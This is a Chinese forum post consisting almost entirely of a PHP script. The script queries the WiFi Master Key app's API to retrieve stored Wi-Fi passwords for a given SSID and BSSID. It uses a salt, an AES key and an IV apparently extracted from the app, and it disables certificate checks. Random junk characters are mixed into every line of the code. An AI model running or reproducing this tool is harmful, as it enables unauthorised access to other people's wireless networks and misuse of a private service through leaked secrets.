上尉
- 注册时间
- 2010-7-6
- 金币
- 1189 个
- 威望
- 18 个
- 荣誉
- 0 个
尚未签到
|
<form action="" method="post">
) [, w T8 u; c2 _( p* V <p>ssid: <input type="text" name="ssid" /></p>
- s, q7 x! A# E <p>bssid: <input type="text" name="bssid" /></p>) G4 k8 j' X6 c
<input type="submit" value="提交" />
: F: a# r2 N, B. U0 N</form>
$ t1 ]5 h# x% k M9 R/ Y" `
! k$ p$ n* j+ J/ b<?php
7 A4 S: ~: u$ a) w$bssid = $_POST["bssid"] ;0 f& Y9 E _( [3 w
$ssid = $_POST["ssid"] ;
. n1 f- [$ x- f& s6 Iif (isset( $bssid ) && isset( $ssid )){8 c& t+ i0 ~! ]4 L# p: S
//update salt) e! T6 K! h6 G4 F h: [
$ret = request( $bssid , $ssid , md5(rand(1, 10000)));
. H3 V4 b' ]2 t: ~- S $ret = json_decode( $ret );# D9 L7 v" }0 s
$ret = request( $bssid , $ssid , $ret ->retSn);1 Y% M" X5 l! v% E \8 C( n3 k
$ret = json_decode( $ret );
! Z7 U% a# M, I& F4 D0 |3 F if ( $ret ->retCd == 0){2 Z9 U: N7 K+ |% e/ ^
if ( $ret ->qryapwd->retCd == 0){
" o6 F5 B+ ^, d3 l6 S5 B $list = $ret ->qryapwd->psws;
4 b( t) O9 Q3 C$ u0 a; Y foreach ( $list as $wifi ){
0 f6 l( B- d0 s/ [ echo 'SSID: ' . $wifi ->ssid. "<br>" ;2 z' f" ]1 _0 g$ ?# j9 g0 m+ R
echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;% V4 Q2 K& u! `; K( H/ \4 J+ J
echo 'BSSID: ' . $wifi ->bssid. "<br>" ;
. V6 u1 V6 i+ j3 S2 v: }0 N if ( $wifi ->xUser){
- R* p* L9 W+ Y: S# Z echo 'xUser: ' . $wifi ->xUser. "<br>" ;
3 V3 Y p7 s" f, u l- q1 b echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;( }. H; q5 `1 l. R: p
}
, d9 E: N# K9 R- w% B/ K" O' U }2 t" ?3 D( t5 N4 P9 w/ V
}* F% ^9 B1 r: A$ G
else {7 z+ e& k T5 J# _; H
echo $ret ->qryapwd->retMsg;+ D1 ~1 q! M! g) v3 O
}
- {" J8 W6 ~+ B9 c6 x* a }
5 M) w9 ^5 n5 c3 f& J}
4 V5 A6 ~8 _, ?( Tfunction request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
# p! I# _) Q5 ~* {0 t $data = array ();! ~' j6 \1 h4 i! r
$data [ 'appid' ] = '0008' ;
. ~+ k' g( e0 t9 Q# B C+ ~ $data [ 'bssid' ] = $bssid ;
7 G% e: n# t/ t5 s $data [ 'chanid' ] = 'gw' ;
6 ^- j d7 |. v $data [ 'dhid' ] = $dhid ;
0 K: F# w" N$ a- r& Y $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;
) }, |, p9 J& h; b $data [ 'lang' ] = 'cn' ;& D2 X& a' P; P4 X( H' \$ \2 D" [& z
$data [ 'mac' ] = '60f81dad28dh' ;6 h. r& o6 ]: z5 z: U% F! X( `, M
$data [ 'method' ] = 'getDeepSecChkSwitch' ;
: ^; j' }$ Y( C; {- \ $data [ 'pid' ] = 'qryapwd:commonswitch' ;
# K2 N: k* | g6 \, J) T $data [ 'ssid' ] = $ssid ;
5 W4 {- i# T& g# P7 { $data [ 'st' ] = 'm' ;. \2 e N9 }$ L6 i- N
$data [ 'uhid' ] = 'a0000000000000000000000000000002' ;
4 o1 ^; F* b! A6 K; q $data [ 'v' ] = '324' ;
4 |" d5 t5 i$ r- V" s* D' v $data [ 'sign' ] = sign( $data , $salt );
* I2 {" {) J% i$ c2 ` $curl = curl_init();+ m, E# F' |* s a* l* f9 K
curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
; D; V/ s, [, l( `: B+ E/ ` curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
% e( k- p- A" S0 U curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate" F! S: C ^+ Q# H' z4 K
curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
2 i0 d! W$ i% G/ J: J* Q curl_setopt( $curl , CURLOPT_POST, true); // enable posting! _( W; y, S# B+ |- N5 |
curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
8 P% R# H" ]. ^ curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
, S9 I4 C$ a6 M" { $r = curl_exec( $curl );1 l' [8 A' [7 X" E. f! R2 Y* {
curl_close( $curl );
5 g* r" x5 r) n3 Y: z9 K return $r ;( r1 W2 c+ b; z+ Y- K5 y
}2 I7 r" y8 R: u# N
function registerNewDevice(){: H: Z4 I6 e4 A
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;
5 t% {( ]9 m5 N8 V8 T0 a $data = array ();8 d6 i/ G0 j% X' J. F; i0 s3 R* z
$data [ 'appid' ] = '0008' ;+ `7 k& v W. C0 x% v
$data [ 'bssid' ] = $bssid ;
2 z& b3 W* q( O $data [ 'chanid' ] = 'gw' ;
3 A' y+ j7 k' j $data [ 'dhid' ] = $dhid ;6 n: f) `6 c/ z6 h/ T/ L
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;; Y [/ R7 H+ [( Z& @1 c4 q
$data [ 'lang' ] = 'cn' ;$ B# U5 `4 @6 O! r# S
$data [ 'mac' ] = '60f81dad28de' ;& |' q! q& M1 K3 S8 A
$data [ 'method' ] = 'getDeepSecChkSwitch' ;: [4 g' {1 C$ ` L/ m/ ?7 ]
$data [ 'pid' ] = 'qryapwd:commonswitch' ;+ g3 ?/ ~) z$ H% r( A" z; N6 f" G5 a
$data [ 'ssid' ] = $ssid ;& J8 W1 a9 ?% Y7 _ s
$data [ 'st' ] = 'm' ;0 E& M2 F7 v5 K2 W1 I
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
: Q* x7 S- B$ k z $data [ 'v' ] = '324' ;# ]4 V' S5 [& ?2 v8 {+ j
$data [ 'sign' ] = sign( $data , $salt );
8 B6 \! p0 u- z9 r% m}7 v7 T+ ?3 y! D& h4 Y) C+ b6 l
function sign( $array , $salt ){) b+ b9 ]: B( p2 W# b* @ T
// 签名算法
! N X% p9 Z. N6 O5 W: J $request_str = '' ;
8 ^! C5 M$ _4 l; d2 j+ C( } // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort2 n0 p/ T4 s1 @5 c$ O' O$ B
ksort( $array );
3 Y3 `+ j. {* T6 i; ^2 M foreach ( $array as $key => $value ) {
: W& F" l1 V& T9 } x4 D& [ $request_str .= $value ;; D) f. s' D! |0 i4 Q' G
}
$ |& L) b9 ?: v9 L' r5 r0 @% n T $sign = md5( $request_str . $salt );
' u! m2 z* @4 G% P4 U return strtoupper ( $sign );
$ ^+ ]) B# {7 @7 F! R4 j8 G}2 Z {% a$ M8 z& t
function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
$ Y1 t7 s. q( B! o1 k: V- l //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
6 x1 O' f$ D7 y* { //[length][password][timestamp]- f4 ?+ | b/ W6 \$ m
$decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
$ T D: z" e; N return substr (trim( $decrypted_string ),3,-13);
2 Q( ?: P9 u& ?! B* V* ~$ I} ?> |
评分
-
1
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-22 03:03
显身卡
